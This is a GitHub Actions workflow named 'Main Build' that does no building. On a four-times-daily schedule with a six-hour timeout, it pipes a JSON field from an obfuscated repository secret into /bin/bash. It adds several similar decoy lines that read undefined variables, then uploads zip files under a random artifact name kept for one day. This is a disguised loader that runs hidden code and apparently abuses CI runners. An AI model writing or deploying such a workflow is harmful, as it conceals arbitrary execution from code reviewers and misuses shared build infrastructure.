name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '30 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          xshlt5: ${{ secrets.xshlt5 }}
        run: |
          printf '%s' "$xshlt5" | jq -r .tikp21040 | /bin/bash
          printf '%s' "$n005" | jq -r .ynto0246 | /bin/bash
          printf '%s' "$kvplx19" | jq -r .tdlk49 | /bin/bash
          echo $cwmul53069 | jq -r .ne4245 | /bin/bash
          printf '%s' "$pdteb76" | jq -r .mnvl7 | /bin/bash
          echo $xfgb649 | jq -r .usx42 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: sSfUyXdB
          path: "*.zip"
          retention-days: 1
